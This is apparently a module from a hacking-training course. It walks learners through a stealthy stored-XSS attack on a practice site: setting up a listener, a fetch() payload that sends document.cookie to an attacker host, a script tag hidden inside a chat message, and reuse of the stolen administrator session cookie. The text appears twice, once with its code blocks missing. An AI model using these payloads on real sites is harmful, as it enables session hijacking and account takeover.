In this module, we exploit the XSS vulnerability in the target practice, so you can start the task below and go through the steps at your own pace.

This module requires secrecy! If the system administrator notices any unusual activity, they may shut down the system.

Steal the administrator's session cookies and authenticate to the system as that user.

In this module, you will exploit XSS vulnerability and hijack the administrator session.

XSS 2


This time the administrator will notice if users start sending unintentional messages, for example! In this task, we resort to an alternative leakage channel, so we send a cookie secretly to an HTTP listener that we have launched on the attacker's server. This way, the cookies are not visible on the site but are transferred unnoticed to the attacker.

We first need a listener to which the cookies can be sent. Fortunately, the attacker's machine already has an HTTP server running on port 80. 

The URL address is listed under the attacker's resources (starting with https://web-).

Open the attacker's terminal and use the 

 command to monitor incoming HTTP requests to the listener.

Next, we will write a malicious code that, when executed, sends cookies to our listener. Let's start by opening the browser developer tools again and writing and testing the attack code in the JavaScript console. In this case, we will use the 

The idea is to make an HTTP request to the attacker's listener, and include the session cookie that we want to steal in the request URL. 

Ignore any errors you may encounter while executing the malicious code.



Once our malicious code is ready for action, an HTTP request should arrive at the listener, containing our user's session cookie.

When we have verified the effectiveness of the malware, we place this 

 element inside and embed it into the vulnerable page in a new message.

Finally, we expect the administrator to read our message, which will result in the execution of our malicious code and the transfer of the administrator's cookies to our listener.

Using the Administrator Session Identifier

As a reminder, here's how to set the system administrator cookie in your browser:

Then we just update the page, and voilà!

*In this module, we exploit the XSS vulnerability in the target practice, so you can start the task below and go through the steps at your own pace.*

@exercise e4ac4ef2c42d

This time the administrator will notice if users start sending unintentional messages, for example! In this task, we resort to an alternative leakage channel, so we send a cookie secretly to an HTTP listener that we have launched on the attacker's server. This way, the cookies are not visible on the site but are transferred unnoticed to the attacker.

## Listener

We first need a listener to which the cookies can be sent. Fortunately, the attacker's machine already has an HTTP server running on port 80. *The URL address is listed under the attacker's resources (starting with https://web-).*

Open the attacker's terminal and use the **tail** command to monitor incoming HTTP requests to the listener.

```sh
tail -f /var/log/apache2/access.log
```

---

## Attack code

Next, we will write a malicious code that, when executed, sends cookies to our listener. Let's start by opening the browser developer tools again and writing and testing the attack code in the JavaScript console. In this case, we will use the **fetch** function to send the cookie as well.

```javascript
fetch("https://web-attacker-.../" + document.cookie);
```

The idea is to make an HTTP request to the attacker's listener, and include the session cookie that we want to steal in the request URL. *Ignore any errors you may encounter while executing the malicious code.*

Once our malicious code is ready for action, an HTTP request should arrive at the listener, containing our user's session cookie.

![](sanity:image-4a3ae57d85e5d4aabdc0a6e358b47ac3cd638320-829x155-png)

---

## Attack

When we have verified the effectiveness of the malware, we place this **script** element inside and embed it into the vulnerable page in a new message.

```html
Hi! How are you? <script>fetch("https://web-attacker-.../" + document.cookie);</script>
```

Finally, we expect the administrator to read our message, which will result in the execution of our malicious code and the transfer of the administrator's cookies to our listener.

---

## Using the Administrator Session Identifier

As a reminder, here's how to set the system administrator cookie in your browser:

```javascript
document.cookie = "SessionId=.eJ...";
```

Then we just update the page, and voilà!


Bleeding of cookies over the network

Learn how to find and exploit a vulnerability that is one of the most common vulnerabilities, easy to find, and yet very dangerous. Hackerone ranked XSS the #1 bug bounty vulnerability of 2021.

XSS (Cross-Site Scripting) vulnerabilities are both common and serious. For example, HackerOne has listed XSS as the number one vulnerability on their top 10 vulnerabilities list.

Vulnerability management is therefore extremely important, whether you are a penetration tester, a security consultant, a developer, or a bounty hunter!

Bleeding of cookies over the network

Listener

Learn to hack — start here